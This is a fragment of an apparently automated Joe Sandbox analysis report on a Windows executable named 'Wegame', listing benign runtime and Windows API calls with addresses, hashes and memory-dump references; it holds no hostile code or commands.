                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                Strings
                                                                Similarity
                                                                • API ID: CloseFind_invalid_parameter_noinfo_noreturnmalloc
                                                                • String ID: _H$_H
                                                                • API String ID: 208310793-427058975
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004621DB
                                                                • GetEnvironmentVariableW.KERNEL32(Path,00000000,00000000,00000034), ref: 00462205
                                                                • GetEnvironmentVariableW.KERNEL32(Path,?,?), ref: 00462245
                                                                Strings
                                                                Similarity
                                                                • API ID: EnvironmentVariable$H_prolog3_
                                                                • String ID: Path
                                                                • API String ID: 3605364767-2875597873
                                                                • Opcode ID: be0da37dea37a51cedb64b2ea7d83027a6c2d2ec1335798da0cd5174a536f8a8
                                                                • Instruction ID: ad132ec14f0f7a898537de1f9f2a0c91724b42d0a4172727f55922428f854f54
                                                                • Opcode Fuzzy Hash: be0da37dea37a51cedb64b2ea7d83027a6c2d2ec1335798da0cd5174a536f8a8
                                                                • Instruction Fuzzy Hash: 57214271D10209EFCF04DFA4C855BDDBBB4AF08314F54016AE115F7191E7786A45CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(004A8F78,00000000,?,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A), ref: 00418AAB
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A,?,?), ref: 00418AEC
                                                                • LeaveCriticalSection.KERNEL32(004A8F78), ref: 00418AF9
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A,?,?), ref: 00418B34
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A,?,?), ref: 00418B62
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Enterfree
                                                                • String ID:
                                                                • API String ID: 3634772007-0
                                                                • Opcode ID: b90086e96675e7c722dbd8d714e8c04ce279348fea110cd856a7562355f0a631
                                                                • Instruction ID: 0b97afb154c658fb9236bf58c6c4c707b249f88e837a5591f778d8f2a116526a
                                                                • Opcode Fuzzy Hash: b90086e96675e7c722dbd8d714e8c04ce279348fea110cd856a7562355f0a631
                                                                • Instruction Fuzzy Hash: 403102B5601A02EFC304CF29D584A56FBB0FF9A325B14C26AE5198B701D775E8A1CFD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(004A8F78,?,85A35C35,?,00415408,?,?,85A35C35,?,0041DCF1,?,85A35C35,?,?,?,?), ref: 004189C9
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,0041DCF1,?,85A35C35,?,?,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A1E
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-0000000C,?,0041DCF1,?,85A35C35,?,?,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A30
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A63
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A88
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Entermalloc
                                                                • String ID:
                                                                • API String ID: 3130977980-0
                                                                • Opcode ID: 14fc1554bde0557481bd55050f217d989e60ef406251548c7d14104e065b12da
                                                                • Instruction ID: 9128c8b9fc889244392de557cb28fbd87a260ff0fb47d463a3225dbcfa21d214
                                                                • Opcode Fuzzy Hash: 14fc1554bde0557481bd55050f217d989e60ef406251548c7d14104e065b12da
                                                                • Instruction Fuzzy Hash: 1E3108B5601606EFD304CF28D484A85FBB4FF49319F14C26AE41887711C779E8A6CBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A528
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A56F
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A598
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A5D8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturnmalloc
                                                                • String ID:
                                                                • API String ID: 1886930152-0
                                                                • Opcode ID: b1b97a821acef4858c232858aa4aa6261457e7420c00eb3568abca641c327acf
                                                                • Instruction ID: 580992fbe9d300bde5c5474ba6591eb3772da0f1bbac663b7e195283aa0d8bb0
                                                                • Opcode Fuzzy Hash: b1b97a821acef4858c232858aa4aa6261457e7420c00eb3568abca641c327acf
                                                                • Instruction Fuzzy Hash: 43412972640104AFC724DF28D9C446EB7E5EF89324B20473FE4AAC7381EB34D965879A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 0043CE5E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@
                                                                • String ID:
                                                                • API String ID: 3551493264-0
                                                                • Opcode ID: 4fbc8a6b7e4ab476ce989919866a224736c818a13e4fafb8a3b246c924703e53
                                                                • Instruction ID: c95ab484f28b58623843dbccda71a19487a5efef89743e121800abdf0669a1bc
                                                                • Opcode Fuzzy Hash: 4fbc8a6b7e4ab476ce989919866a224736c818a13e4fafb8a3b246c924703e53
                                                                • Instruction Fuzzy Hash: DB51DE76A006059FC714CF2DD8C09A9FBA1FF5D320B10426BE81A9BB90D735EC64CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35,?,00000000), ref: 004384E0
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,00000001,00000000), ref: 0043B163
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(00000010,00000000,00000001,00000000,7FFFFFFF,00000000,00000001,00000000), ref: 0043B171
                                                                  • Part of subcall function 0043B0A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000), ref: 0043B1B4
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(00000000,?,00000000,00000001,00000000), ref: 0043B1BC
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(7FFFFFFF,00000000,00000001,00000000,?,00000000,00000001,00000000), ref: 0043B1C8
                                                                • memmove.VCRUNTIME140(00000000,0048BD04,00000001,85A35C35,?,00000000,-00000001,?,?,?,0043817F,?), ref: 0043851B
                                                                • memmove.VCRUNTIME140(?,-00000001,00000000,85A35C35,?,00000000,-00000001,?,?,?,0043817F,?), ref: 0043859F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,-00000001,00000000,85A35C35), ref: 004385E4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 2580228974-0
                                                                • Opcode ID: 97ff42d9d0229c68f983094b9063c60cea27d9bb004ffb07662ca7f4d63b32d8
                                                                • Instruction ID: ecc9c8734b14a7c33637c52ce60bb94fb7a6eda2d1fb40299b2e139b6323903a
                                                                • Opcode Fuzzy Hash: 97ff42d9d0229c68f983094b9063c60cea27d9bb004ffb07662ca7f4d63b32d8
                                                                • Instruction Fuzzy Hash: E751B171A00204AFDB14DF68D980BEEBBB5EB49314F24411EF811A7281DB79A945CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,?,85A35C35), ref: 004103F2
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,00000000), ref: 0041041C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410451
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410522
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$_waccesswcscpy_s
                                                                • String ID:
                                                                • API String ID: 3811951045-0
                                                                • Opcode ID: b825c10a6e9be966018eceb1defc90318170d0211b5f1fac0ce32c0e6e58ab79
                                                                • Instruction ID: 7df4e832ddbbc62326e42b4c487fd2619298edb7335f2f5ebc5214c12848999a
                                                                • Opcode Fuzzy Hash: b825c10a6e9be966018eceb1defc90318170d0211b5f1fac0ce32c0e6e58ab79
                                                                • Instruction Fuzzy Hash: 97510271A002049BCB14CF68DD88BDE7BB5FF85314F10462AE615AB2D1DBB8A9C5CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(004A7FAC,Function_0003DC0C,004A7FB0,85A35C35), ref: 004708B6
                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35), ref: 004708C2
                                                                • __RTDynamicCast.VCRUNTIME140(?,00000000,004A43B4,004A78EC,00000000,85A35C35), ref: 004708F8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CastDynamicExecute_once@std@@Uonce_flag@1@terminate
                                                                • String ID:
                                                                • API String ID: 799945358-0
                                                                • Opcode ID: 1100a5acc7dbeced2651a55da063f783dfe2b306191ed6a6e715d5b814105616
                                                                • Instruction ID: 2e372d3d858aa7cc7a225e5597f845a2e72d017333a4fcb2bbcf9573a442812a
                                                                • Opcode Fuzzy Hash: 1100a5acc7dbeced2651a55da063f783dfe2b306191ed6a6e715d5b814105616
                                                                • Instruction Fuzzy Hash: BF31BCB5A04205EFCB10DF58C941FAAFBF4EB99710F20856AF84997341D734E900CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 0045272F
                                                                • _Find_unchecked.LIBCPMT ref: 00452785
                                                                • _Find_unchecked.LIBCPMT ref: 004527BB
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00000000,?,?,0000000C,00000000,00000000,?,?,0000000C,004522F2,?,?,?,00000000), ref: 004527F5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Find_unchecked$ExceptionH_prolog3_catchThrow
                                                                • String ID:
                                                                • API String ID: 3464409187-0
                                                                • Opcode ID: 0f432e5df6149d901b0c9e7f70f284f138627b71c3c2be90aa95632e893ef812
                                                                • Instruction ID: fce1266d4da8e07e5d11c58affdcccc6e68e9a4bac12ecf1581439409669adf9
                                                                • Opcode Fuzzy Hash: 0f432e5df6149d901b0c9e7f70f284f138627b71c3c2be90aa95632e893ef812
                                                                • Instruction Fuzzy Hash: A0210871A00106ABDF04EF79C986AADBBA5EF49304F10411FFD18A7292DB785D108699
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 00452663
                                                                • _Find_unchecked.LIBCPMT ref: 004526B4
                                                                • _Find_unchecked.LIBCPMT ref: 004526EA
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00000000,?,?,0000000C,004522F2,?,?,?,00000000), ref: 00452722
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Find_unchecked$ExceptionH_prolog3_catchThrow
                                                                • String ID:
                                                                • API String ID: 3464409187-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 004489A8
                                                                • wcsrchr.VCRUNTIME140(?,0000005C,?,?,00000104), ref: 004489D1
                                                                • wcsrchr.VCRUNTIME140(?,0000002F,?,0000005C,?,?,00000104), ref: 004489E4
                                                                • wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000104), ref: 00448A0E
                                                                Similarity
                                                                • API ID: wcsrchr$memsetwcsncpy
                                                                • String ID:
                                                                • API String ID: 1211469149-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C473
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C497
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C4B8
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C4CE
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 2505503336-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(004A8E7C,?,?,00434A9F,004A8FB0,0047C200), ref: 0046ED3A
                                                                • LeaveCriticalSection.KERNEL32(004A8E7C,?,?,00434A9F,004A8FB0,0047C200), ref: 0046ED6D
                                                                • SetEvent.KERNEL32(00000000,00434A9F,004A8FB0,0047C200), ref: 0046EDFB
                                                                • ResetEvent.KERNEL32 ref: 0046EE07
                                                                Similarity
                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                • String ID:
                                                                • API String ID: 3553466030-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00464200
                                                                • ?get_exe_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,00000034,00463C26,00000000,00459F4F), ref: 00464223
                                                                • ?extract_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@@Z.COMMON(00000000,?,?,?,?,00000034,00463C26,00000000,00459F4F), ref: 00464231
                                                                • ?set_app_path@Application@common@ierd_tgp@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 0046424A
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Application@common@ierd_tgp@@D@2@@std@@$?extract_path@common@ierd_tgp@@?get_exe_path@?set_app_path@D@2@@std@@@H_prolog3_V34@@_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3206918494-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00418978
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0041898A
                                                                • LeaveCriticalSection.KERNEL32(?,?,?), ref: 004189B0
                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?), ref: 004189B7
                                                                Similarity
                                                                • API ID: CriticalSection$DeleteEnterLeavefree
                                                                • String ID:
                                                                • API String ID: 682159224-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(004A8070,004489C4,0044AEC3,?,?,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4), ref: 00448C44
                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4,?,?,00000104), ref: 00448C50
                                                                • GetModuleFileNameW.KERNEL32(00000000,004A8070,00000104,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4,?,?), ref: 00448C5D
                                                                • wcsrchr.VCRUNTIME140(004A8070,0000005C,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4,?,?,00000104), ref: 00448C66
                                                                Similarity
                                                                • API ID: Module$FileHandleNamewcslenwcsrchr
                                                                • String ID:
                                                                • API String ID: 3944412705-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0041C6F0: memset.VCRUNTIME140(?,00000000,0000009C,?,?), ref: 0041C71D
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(list<T> too long,?,?,-00000005,85A35C35,?,?,00000001), ref: 004202D5
                                                                Strings
                                                                Similarity
                                                                • API ID: Xlength_error@std@@memset
                                                                • String ID: list<T> too long
                                                                • API String ID: 1527646195-4027344264
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,85A35C35,?,00000008), ref: 004220FF
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long), ref: 0042212F
                                                                Strings
                                                                Similarity
                                                                • API ID: Xlength_error@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 2650047715-1285458680
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?,?,map/set<T> too long,?,?,?,?,map/set<T> too long,?), ref: 00440757
                                                                • __EH_prolog3_catch.LIBCMT ref: 00440764
                                                                  • Part of subcall function 0043FAD1: __EH_prolog3_catch.LIBCMT ref: 0043FAD8
                                                                Strings
                                                                Similarity
                                                                • API ID: H_prolog3_catch$Xlength_error@std@@
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 33345211-1285458680
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00414BBE,?,85A35C35,?,?,?,85A35C35,?,?), ref: 004148C1
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,00414BBE,?,85A35C35,?,?,?,85A35C35,?,?), ref: 004148EF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Xlength_error@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 2650047715-1285458680
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • FormatMessageA.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,85A35C35), ref: 00470C21
                                                                • LocalFree.KERNEL32(00000000,00000000,00000001), ref: 00470D6B
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 0040C810: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP140(invalid string position,00402121), ref: 0040C815
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FormatFreeLocalMessageXout_of_range@std@@memmove
                                                                • String ID: Unknown error
                                                                • API String ID: 2313771647-83687255
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0044639F
                                                                  • Part of subcall function 00441EDA: __EH_prolog3.LIBCMT ref: 00441EE1
                                                                • _Copy_construct_from.LIBCPMT ref: 004464D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446535
                                                                  • Part of subcall function 00441DD5: __EH_prolog3.LIBCMT ref: 00441DDC
                                                                • _Copy_construct_from.LIBCPMT ref: 0044666B
                                                                Strings
                                                                Memory Dump Source
